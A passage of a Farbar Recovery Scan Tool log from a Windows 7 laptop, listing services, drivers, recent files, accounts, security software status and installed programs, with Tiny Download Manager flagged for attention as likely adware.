R2 MsMpSvc; c:\Program Files\Microsoft Security Client\MsMpEng.exe [23816 2015-04-30] (Microsoft Corporation)
S3 MyWiFiDHCPDNS; C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe [265936 2014-08-18] ()
R3 NisSrv; c:\Program Files\Microsoft Security Client\NisSrv.exe [366544 2015-04-30] (Microsoft Corporation)
R2 QBCFMonitorService; C:\Program Files (x86)\Common Files\Intuit\QuickBooks\QBCFMonitorService.exe [45056 2016-02-11] (Intuit) [File not signed]
S3 QBFCService; C:\Program Files (x86)\Common Files\Intuit\QuickBooks\FCS\Intuit.QuickBooks.FCS.exe [65536 2016-02-11] (Intuit Inc.) [File not signed]
R2 QBVSS; C:\Program Files (x86)\Common Files\Intuit\DataProtect\QBIDPService.exe [1248256 2016-02-11] (Intuit Inc.) [File not signed]
S3 ShareItSvc; C:\Program Files (x86)\Lenovo\SHAREit\Shareit.Service.exe [31176 2016-01-20] (SHAREit Technologies Co.Ltd)
S3 SUService; C:\Program Files (x86)\Lenovo\System Update\SUService.exe [21536 2016-05-25] ()
R2 VmbService; C:\Program Files (x86)\Vodafone\Vodafone Mobile Broadband\Bin\VmbService.exe [9216 2011-04-19] (Vodafone) [File not signed]
S4 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Corporation)
R2 ZeroConfigService; C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe [3817168 2014-08-18] (Intel® Corporation)

===================== Drivers (Whitelisted) ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R3 bcbtums; C:\Windows\System32\drivers\bcbtums.sys [170200 2013-03-27] (Broadcom Corporation.)
R3 cbfs3; C:\Windows\System32\DRIVERS\cbfs3.sys [352144 2012-04-09] (EldoS Corporation)
S3 ebdrv; C:\Windows\system32\drivers\evbda.sys [3286016 2009-06-10] (Broadcom Corporation)
S3 huawei_wwanecm; C:\Windows\System32\DRIVERS\ew_juwwanecm.sys [196608 2011-04-18] (Huawei Technologies Co., Ltd.)
R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [25816 2015-06-18] (Malwarebytes Corporation)
S3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [63704 2015-06-18] (Malwarebytes Corporation)
R3 MEIx64; C:\Windows\System32\DRIVERS\TeeDriverx64.sys [100824 2013-12-03] (Intel Corporation)
R0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [280376 2015-03-04] (Microsoft Corporation)
R1 MpKsl8f9643bf; c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{1AF1E580-AE43-4D36-BB0F-5924AF6D53C1}\MpKsl8f9643bf.sys [44928 2016-07-03] (Microsoft Corporation)
R2 NisDrv; C:\Windows\System32\DRIVERS\NisDrvWFP.sys [124568 2015-03-04] (Microsoft Corporation)
R3 RCUVCAVS; C:\Windows\System32\DRIVERS\RCUVCAVS.sys [177920 2013-07-05] (Ricoh co.,Ltd.)
R3 SmbDrvI; C:\Windows\System32\DRIVERS\Smb_driver_Intel.sys [45296 2014-07-28] (Synaptics Incorporated)
R2 smihlp; C:\Program Files\ThinkVantage Fingerprint Software\smihlp.sys [13128 2011-05-30] (Authentec Inc.)
R3 usb3Hub; C:\Windows\System32\DRIVERS\usb3Hub.sys [206744 2013-06-20] (Windows ® Win 7 DDK provider)

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-07-03 12:53 - 2016-07-03 12:55 - 00028023 _____ C:\Users\User1\Desktop\FRST.txt
2016-07-03 12:51 - 2016-07-03 12:53 - 00000000 ____D C:\FRST
2016-07-03 12:51 - 2016-07-03 12:51 - 02390016 _____ (Farbar) C:\Users\User1\Desktop\FRST64.exe
2016-07-02 20:22 - 2016-07-02 20:27 - 00002040 _____ C:\Users\User1\Desktop\Rkill.txt
2016-07-02 20:06 - 2016-07-02 20:06 - 02030536 _____ (Bleeping Computer, LLC) C:\Users\User1\Desktop\rkill.exe
2016-07-02 19:26 - 2016-07-02 19:26 - 00000261 _____ C:\Users\User1\Desktop\2016-07 Attempted Virus.txt
2016-07-02 19:25 - 2016-07-02 19:25 - 00000886 _____ C:\Users\User1\Desktop\2016-07 TO DO GENERAL.txt
2016-07-02 19:19 - 2016-07-02 19:19 - 00000220 _____ C:\Users\User1\Desktop\2016-07 To Do MM.txt
2016-07-02 19:15 - 2016-07-02 19:17 - 00000265 _____ C:\Users\User1\Desktop\2016-07 TO DO CAREER.txt
2016-06-28 12:10 - 2016-06-28 15:49 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2016-06-21 09:08 - 2016-06-21 09:08 - 00000652 _____ C:\Users\User1\Desktop\2016-06-21 To Do.txt
2016-06-21 09:07 - 2016-06-21 09:07 - 00003313 _____ C:\Users\User1\Desktop\2016-06-21 New Panora - put in Scriv.txt
2016-06-20 15:16 - 2016-06-20 15:16 - 00000000 ____D C:\Users\User1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\FwWordConverter
2016-06-20 15:16 - 2016-06-20 15:16 - 00000000 ____D C:\Program Files (x86)\RL-Software
2016-06-20 15:10 - 2016-06-21 09:09 - 00000000 ____D C:\Users\User1\Desktop\Pandora
2016-06-20 15:10 - 2016-06-20 15:11 - 00000000 ____D C:\Users\User1\Desktop\MM
2016-06-20 10:09 - 2016-06-20 10:09 - 00000000 ____D C:\Users\User1\.QtWebEngineProcess
2016-06-20 10:09 - 2016-06-20 10:09 - 00000000 ____D C:\Users\User1\.LSC
2016-06-08 00:54 - 2016-06-28 15:49 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox.bak

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-07-03 12:40 - 2014-05-24 18:43 - 00000830 _____ C:\Windows\Tasks\Adobe Flash Player Updater.job
2016-07-03 12:38 - 2009-07-13 23:45 - 00031296 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2016-07-03 12:38 - 2009-07-13 23:45 - 00031296 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2016-07-03 12:16 - 2014-05-30 19:10 - 00000898 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2016-07-02 23:29 - 2016-01-06 17:01 - 00013122 _____ C:\Users\User1\Desktop\New Year's Resolutions.xlsx
2016-07-02 23:29 - 2014-05-30 23:59 - 00000000 ____D C:\Users\User1\AppData\Roaming\Skype
2016-07-02 19:46 - 2009-07-14 00:13 - 00884036 _____ C:\Windows\system32\PerfStringBackup.INI
2016-07-02 19:46 - 2009-07-13 22:20 - 00000000 ____D C:\Windows\inf
2016-07-02 19:19 - 2013-04-23 16:48 - 00000000 ____D C:\Users\User1\Documents\Car
2016-07-02 19:11 - 2016-05-28 15:21 - 00006094 _____ C:\Users\User1\Desktop\2016-05 revive.txt
2016-07-02 18:58 - 2014-05-24 17:05 - 00000000 ____D C:\Users\User1\Documents\Career
2016-07-02 18:55 - 2014-05-31 00:42 - 00113880 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2016-07-02 18:16 - 2014-05-30 19:10 - 00000894 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2016-07-02 17:24 - 2012-09-24 21:49 - 00000000 ____D C:\Users\User1\Documents\Financial
2016-07-02 16:33 - 2013-04-24 18:02 - 00000000 ____D C:\Users\User1\Documents\Writing - Publishing
2016-06-30 15:45 - 2013-03-08 13:21 - 00024460 _____ C:\Users\User1\Documents\Reading List.xlsx
2016-06-28 15:49 - 2014-05-22 18:19 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2016-06-28 11:34 - 2012-07-27 16:23 - 00008727 _____ C:\Users\User1\Documents\Address Book (merge).xlsx
2016-06-28 10:12 - 2012-11-19 04:40 - 00000000 ____D C:\Users\User1\Documents\Health
2016-06-26 12:30 - 2014-05-24 18:54 - 00000000 ____D C:\ProgramData\Oracle
2016-06-26 11:54 - 2014-12-22 18:33 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2016-06-26 11:54 - 2014-12-22 18:33 - 00000000 ____D C:\Program Files (x86)\Java
2016-06-26 11:53 - 2015-09-07 16:40 - 00000000 ____D C:\Users\User1\.oracle_jre_usage
2016-06-26 11:53 - 2014-12-22 18:33 - 00097344 _____ (Oracle Corporation) C:\Windows\SysWOW64\WindowsAccessBridge-32.dll
2016-06-26 11:52 - 2016-04-15 19:10 - 00000000 ____D C:\Users\User1\Desktop\Installers
2016-06-21 10:27 - 2016-02-26 17:09 - 00000000 ____D C:\Program Files (x86)\Steam
2016-06-21 10:24 - 2009-07-14 00:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2016-06-20 10:09 - 2014-05-30 11:07 - 00000000 ____D C:\Users\User1\AppData\Roaming\Lenovo
2016-06-20 10:09 - 2014-05-16 11:49 - 00000000 ____D C:\Users\User1
2016-06-20 08:22 - 2014-05-16 12:09 - 00000000 ___HD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lenovo ThinkVantage Tools
2016-06-20 08:22 - 2014-05-16 12:09 - 00000000 ____D C:\Windows\System32\Tasks\TVT
2016-06-20 08:22 - 2014-05-16 12:09 - 00000000 ____D C:\Windows\System32\Tasks\Lenovo
2016-06-20 08:22 - 2014-05-16 12:09 - 00000000 ____D C:\Program Files (x86)\Lenovo
2016-06-20 08:21 - 2014-05-16 12:09 - 00000000 ____D C:\ProgramData\lenovo
2016-06-17 20:17 - 2014-05-30 19:11 - 00002206 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2016-06-17 20:17 - 2014-05-30 19:11 - 00002194 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2016-06-17 03:40 - 2014-05-24 18:43 - 00796352 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2016-06-17 03:40 - 2014-05-24 18:43 - 00142528 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2016-06-17 03:40 - 2014-05-24 18:43 - 00003768 _____ C:\Windows\System32\Tasks\Adobe Flash Player Updater
2016-06-06 22:03 - 2012-11-20 04:39 - 00000000 ____D C:\Users\User1\Documents\To Do
2016-06-04 11:46 - 2012-10-31 23:36 - 00000000 ____D C:\Users\User1\Documents\Recipes

==================== Files in the root of some directories =======

2014-05-29 00:54 - 2014-05-29 00:54 - 0000000 _____ () C:\Program Files (x86)\Mozilla Firefoxwtu-secure-search.xml
2014-12-27 21:52 - 2014-12-27 21:52 - 0033193 _____ () C:\Users\User1\AppData\Roaming\UserTile.png
2015-04-15 10:59 - 2015-04-15 10:59 - 0000852 _____ () C:\Users\User1\AppData\Local\recently-used.xbel
2014-05-16 11:17 - 2015-09-08 01:34 - 0007598 _____ () C:\Users\User1\AppData\Local\resmon.resmoncfg
2014-05-30 19:14 - 2014-05-30 19:15 - 0037497 _____ () C:\Users\User1\AppData\Local\WiDiSetupLog.20140530.201458.wdl
2011-04-18 07:39 - 2011-04-18 07:39 - 0226364 ____R () C:\ProgramData\DeviceManager.xml.rc4
2014-05-16 11:21 - 2014-05-16 11:21 - 0000000 ____H () C:\ProgramData\DP45977C.lfl

Some files in TEMP:
====================
C:\Users\User1\AppData\Local\Temp\jre-8u60-windows-au.exe
C:\Users\User1\AppData\Local\Temp\jre-8u66-windows-au.exe
C:\Users\User1\AppData\Local\Temp\jre-8u71-windows-au.exe
C:\Users\User1\AppData\Local\Temp\jre-8u73-windows-au.exe
C:\Users\User1\AppData\Local\Temp\jre-8u77-windows-au.exe
C:\Users\User1\AppData\Local\Temp\jre-8u91-windows-au.exe
C:\Users\User1\AppData\Local\Temp\MSIZAP.EXE


==================== Bamital & volsnap =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2016-06-21 17:36

==================== End of FRST.txt ============================

 

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 02-07-2016
Ran by User1 (2016-07-03 12:55:57)
Running from C:\Users\User1\Desktop
Windows 7 Professional Service Pack 1 (X64) (2014-05-16 16:49:47)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-2572138134-34439291-2312372487-500 - Administrator - Disabled)
Guest (S-1-5-21-2572138134-34439291-2312372487-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-2572138134-34439291-2312372487-1002 - Limited - Enabled)
User1 (S-1-5-21-2572138134-34439291-2312372487-1000 - Administrator - Enabled) => C:\Users\User1

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Microsoft Security Essentials (Enabled - Up to date) {B7ECF8CD-0188-6703-DBA4-AA65C6ACFB0A}
AS: Microsoft Security Essentials (Enabled - Up to date) {0C8D1929-27B2-688D-E114-9117BD2BB1B7}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

7-Zip 9.20 (x64 edition) (HKLM\...\{23170F69-40C1-2702-0920-000001000000}) (Version: 9.20.00.0 - Igor Pavlov)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 21.0.0.176 - Adobe Systems Incorporated)
Adobe Flash Player 22 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 22.0.0.192 - Adobe Systems Incorporated)
Adobe Flash Player 22 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 22.0.0.192 - Adobe Systems Incorporated)
Amazon Send to Kindle (HKLM-x32\...\SendToKindle) (Version: 1.0.1.240 - Amazon)
Amazon Unbox Video (HKLM-x32\...\InstallShield_{54A4839E-87F8-4BD1-9682-A349E9943F0A}) (Version: 5.0.0.17 - Amazon.com)
Amazon Unbox Video (x32 Version: 5.0.0.17 - Amazon.com) Hidden
Apple Application Support (32-bit) (HKLM-x32\...\{26356515-5821-40FA-9C3D-9785052A1062}) (Version: 4.3.1 - Apple Inc.)
Apple Application Support (64-bit) (HKLM\...\{C2651553-6CA3-4822-B2E6-BC4ACA6E0EA2}) (Version: 4.3.1 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{2E4AF2A6-50EA-4260-9BA4-5E582D11879A}) (Version: 9.3.0.15 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{56EC47AA-5813-4FF6-8E75-544026FBEA83}) (Version: 2.2.0.150 - Apple Inc.)
Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)
Brother MFL-Pro Suite MFC-J6920DW (HKLM-x32\...\{6A367B4D-2E1C-4843-9FF0-A1DF1DEAB1E6}) (Version: 1.0.0.0 - Brother Industries, Ltd.)
Chicktionary (HKLM-x32\...\Chicktionary) (Version: 32.0.0.0 - Shockwave.com)
Dolby Home Theater v4 (HKLM-x32\...\{B26438B4-BF51-49C3-9567-7F14A5E40CB9}) (Version: 7.2.8000.17 - Dolby Laboratories Inc)
Dominion (HKLM-x32\...\Dominion) (Version: 2.01.03.15 - MakingFun)
DVDSmith Movie Backup 1.0.8 (HKLM-x32\...\DVDSmith Movie Backup_is1) (Version:  - dvdsmith.com)
EditPad Lite 7.3.8 (HKLM\...\EditPad Lite) (Version: 7.3.8 - Just Great Software)
FileZilla Client 3.9.0.3 (HKLM-x32\...\FileZilla Client) (Version: 3.9.0.3 - Tim Kosse)
Foxit Cloud (HKLM-x32\...\{41914D8B-9D6E-4764-A1F9-BC43FB6782C1}_is1) (Version: 2.9.56.313 - Foxit Software Inc.)
Foxit PhantomPDF Standard (HKLM-x32\...\{0A33872C-25C0-4E0A-80DB-53067BB717DD}) (Version: 7.1.3.320 - Foxit Software Inc.)
Foxit Reader (HKLM-x32\...\Foxit Reader_is1) (Version: 7.1.3.320 - Foxit Software Inc.)
Framework to DOC Converter (HKLM-x32\...\FwWordConverter) (Version:  - )
GIMP 2.8.10 (HKLM\...\GIMP-2_is1) (Version: 2.8.10 - The GIMP Team)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 51.0.2704.103 - Google Inc.)
Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.30.3 - Google Inc.) Hidden
HandBrake 0.9.9.1 (HKLM-x32\...\HandBrake) (Version: 0.9.9.1 - )
iExplorer 3.8.1.0 (HKLM-x32\...\{7FD8B0C1-CDDA-4B4D-A577-B2E3570EA3A3}_is1) (Version:  - Macroplant LLC)
Instant Eyedropper 1.8.0.0 (HKLM-x32\...\Instant Eyedropper_is1) (Version:  - )
Integrated Camera Driver Installer Package Ver.1.0.0.30 (HKLM-x32\...\{F8754583-7893-4CD8-9E51-1A08F3D4C1A9}) (Version: 1.0.0.30 - RICOH)
Intel® Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 9.5.22.1760 - Intel Corporation)
Intel® Network Connections Drivers (HKLM\...\PROSet) (Version: 18.7 - Intel)
Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 9.18.10.3359 - Intel Corporation)
Intel® SDK for OpenCL - CPU Only Runtime Package (HKLM-x32\...\{FCB3772C-B7D0-4933-B1A9-3707EBACC573}) (Version: 3.0.0.66956 - Intel Corporation)
Intel® USB 3.0 eXtensible Host Controller Driver (HKLM-x32\...\{240C3DDD-C5E9-4029-9DF7-95650D040CF2}) (Version: 1.0.9.254 - Intel Corporation)
Intel® WiDi (HKLM\...\{F949AE30-83D1-41B2-92D2-F44478DD058A}) (Version: 4.2.24.0 - Intel Corporation)
Intel® PROSet/Wireless Software (HKLM-x32\...\{7991b5ae-96d7-4df2-97fb-a605b7cb638b}) (Version: 17.12.0 - Intel Corporation)
iTunes (HKLM\...\{58D7E5F7-BAD1-49C5-93C8-B655736EDA00}) (Version: 12.4.0.119 - Apple Inc.)
Java 8 Update 91 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218091F0}) (Version: 8.0.910.15 - Oracle Corporation)
King's Bounty: Crossworlds (HKLM\...\Steam App 63910) (Version:  - Katauri Interactive)
Lenovo Auto Scroll Utility (HKLM\...\LenovoAutoScrollUtility) (Version: 2.12 - )
Lenovo Communications Utility (HKLM\...\{88C6A6D9-324C-46E8-BA87-563D14021442}_is1) (Version: 3.1.16.0 - Lenovo)
Lenovo On Screen Display (HKLM\...\OnScreenDisplay) (Version: 8.80.10 - Lenovo)
Lenovo Patch Utility 64 bit (Version: 1.3.2.6 - Lenovo Group Limited) Hidden
Lenovo Power Management Driver (HKLM\...\Power Management Driver) (Version: 1.67.10.20 - Lenovo)
Lenovo Solution Center (HKLM\...\{AB46AC6D-3E9A-4484-8061-64FF10301B41}) (Version: 3.3.002.00 - Lenovo)
Lenovo System Update (HKLM-x32\...\{25C64847-B900-48AD-A164-1B4F9B774650}) (Version: 5.07.0029 - Lenovo)
Magical Jelly Bean KeyFinder (HKLM-x32\...\KeyFinder_is1) (Version: 2.0.10.10 - Magical Jelly Bean)
Malwarebytes Anti-Malware version 2.1.8.1057 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.1.8.1057 - Malwarebytes Corporation)
Metric Collection SDK (x32 Version: 1.1.0005.00 - Lenovo Group Limited) Hidden
Metric Collection SDK 35 (x32 Version: 1.2.0001.00 - Lenovo Group Limited) Hidden
Microsoft .NET Framework 4.5.2 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.51209 - Microsoft Corporation)
Microsoft Office 2007 Primary Interop Assemblies (HKLM-x32\...\{50120000-1105-0000-0000-0000000FF1CE}) (Version: 12.0.4518.1014 - Microsoft Corporation)
Microsoft Office 2007 Service Pack 3 (SP3) (HKLM-x32\...\{91120000-0014-0000-0000-0000000FF1CE}_PROR_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version:  - Microsoft)
Microsoft Office File Validation Add-In (HKLM-x32\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft Office Professional 2007 (HKLM-x32\...\PROR) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 4.8.204.0 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.40728.0 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual Studio 2005 Tools for Office Runtime (HKLM-x32\...\Microsoft Visual Studio 2005 Tools for Office Runtime) (Version:  - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
MKVToolNix 7.4.0 (64bit) (HKLM-x32\...\MKVToolNix) (Version: 7.4.0 - Moritz Bunkus)
Mozilla Firefox 47.0.1 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 47.0.1 (x86 en-US)) (Version: 47.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 47.0.1.6018 - Mozilla)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
NirSoft ProduKey (HKLM-x32\...\NirSoft ProduKey) (Version:  - )
oDesk Team (HKU\S-1-5-21-2572138134-34439291-2312372487-1000\...\oDVT) (Version:  - oDesk Corporation)
Organ Trail: Director's Cut (HKLM-x32\...\Steam App 233740) (Version:  - The Men Who Wear Many Hats)
PDF Combine (HKLM-x32\...\PDF Combine_is1) (Version: 2.5 - Softplicity, Inc.)
Power Manager (HKLM-x32\...\{DAC01CEE-5BAE-42D5-81FC-B687E84E8405}) (Version: 6.68.10 - Lenovo Group Limited)
QuickBooks (x32 Version: 26.0.4005.2607 - Intuit Inc.) Hidden
QuickBooks Pro 2016 (HKLM-x32\...\{4338BDE2-0035-41BC-87BE-EE0AD5D48042}) (Version: 26.0.4005.2607 - Intuit Inc.)
QuickBooks Runtime Redistributable (HKLM\...\{F2A4F809-2DE6-4D27-888B-4D2BB8DAF20E}) (Version: 1.00.0000 - Intuit Inc.)
Railroad Tycoon 3 (HKLM-x32\...\{DE29025A-091F-4998-AD2D-24C84421190F}) (Version: 1.0 - )
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7404 - Realtek Semiconductor Corp.)
RICOH_Media_Driver_v2.14.18.01 (HKLM-x32\...\{FE041B02-234C-4AAA-9511-80DF6482A458}) (Version: 2.14.18.01 - RICOH)
Scrivener (HKLM-x32\...\Scrivener 1900) (Version: 1900 - Literature and Latte)
Serif DrawPlus Starter Edition (HKLM-x32\...\{33311EA4-0ECA-4E7F-83E5-8A92CD760152}) (Version: 2.0.2.010 - Serif (Europe) Ltd)
SHAREit (HKLM-x32\...\SHAREit_is1) (Version: 3.2.0.543 - Lenovo)
Skype™ 7.24 (HKLM-x32\...\{FC965A47-4839-40CA-B618-18F486F042C6}) (Version: 7.24.104 - Skype Technologies S.A.)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
The Bottom of the Well (HKLM\...\Steam App 449020) (Version:  - Red Nettle Studio)
ThinkPad Bluetooth with Enhanced Data Rate Software (HKLM\...\{A1439D4F-FD46-47F2-A1D3-FEE097C29A09}) (Version: 6.5.1.4500 - Broadcom Corporation)
ThinkPad UltraNav Driver (HKLM\...\SynTPDeinstKey) (Version: 16.2.19.14 - )
ThinkVantage Access Connections (HKLM-x32\...\{8E537894-A559-4D60-B3CB-F4485E3D24E3}) (Version: 6.25.65 - Lenovo)
ThinkVantage Active Protection System (HKLM\...\{46A84694-59EC-48F0-964C-7E76E9F8A2ED}) (Version: 1.79.00.03 - Lenovo)
ThinkVantage Fingerprint Software (HKLM\...\{F58DA859-016E-492D-A588-317D9BB28002}) (Version: 5.9.9.7282 - Authentec Inc.)
ThinkVantage Password Manager (HKLM-x32\...\{70EE2BAA-F82A-4B8A-950E-649EFD64D5B9}) (Version: 4.60.4.0 - Lenovo Group Limited)
Tiny Download Manager (remove only) (HKLM-x32\...\TinyDM) (Version: 2 - TinyDM LTD) <==== ATTENTION
To Burn in Memory (HKLM\...\Steam App 434120) (Version:  - Orihaus)
Trine 2 (HKLM\...\Steam App 35720) (Version:  - Frozenbyte)
Update for 2007 Microsoft Office System (KB967642) (HKLM-x32\...\{91120000-0014-0000-0000-0000000FF1CE}_PROR_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version:  - Microsoft)
VC12X64Redist (HKLM\...\{B573CC21-AE24-4BC5-9B0B-15CF29A3F982}) (Version: 1.00.0000 - Intuit Inc.)
VC12X86Redist (HKLM-x32\...\{EA9886ED-21F8-4867-A049-CE6817291EE6}) (Version: 1.00.0000 - Intuit Inc.)
Visual Studio Tools for the Office system 3.0 Runtime (HKLM-x32\...\Visual Studio Tools for the Office system 3.0 Runtime) (Version:  - Microsoft Corporation)
Visual Studio Tools for the Office system 3.0 Runtime Service Pack 1 (KB949258) (HKLM-x32\...\{8FB53850-246A-3507-8ADE-0060093FFEA6}.KB949258) (Version: 1 - Microsoft Corporation)
VLC media player (HKLM\...\VLC media player) (Version: 2.2.1 - VideoLAN)
Vodafone Mobile Broadband Lite (HKLM-x32\...\{6C29152D-3FF9-43B2-84E4-9B35FC0BF5C2}) (Version: 10.2.103.31248 - Vodafone)
Wireshark 2.0.3 (64-bit) (HKLM-x32\...\Wireshark) (Version: 2.0.3 - The Wireshark developer community, hxxps://www.wireshark.org)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-2572138134-34439291-2312372487-1000_Classes\CLSID\{005A3A96-BAC4-4B0A-94EA-C0CE100EA736}\localserver32 -> C:\Users\User1\AppData\Roaming\Dropbox\bin\Dropbox.exe /autoplay => No File
CustomCLSID: HKU\S-1-5-21-2572138134-34439291-2312372487-1000_Classes\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\User1\AppData\Roaming\Dropbox\bin\DropboxExt64.24.dll => No File
CustomCLSID: HKU\S-1-5-21-2572138134-34439291-2312372487-1000_Classes\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\User1\AppData\Roaming\Dropbox\bin\DropboxExt64.24.dll => No File
CustomCLSID: HKU\S-1-5-21-2572138134-34439291-2312372487-1000_Classes\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\User1\AppData\Roaming\Dropbox\bin\DropboxExt64.24.dll => No File
CustomCLSID: HKU\S-1-5-21-2572138134-34439291-2312372487-1000_Classes\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\User1\AppData\Roaming\Dropbox\bin\DropboxExt64.24.dll => No File
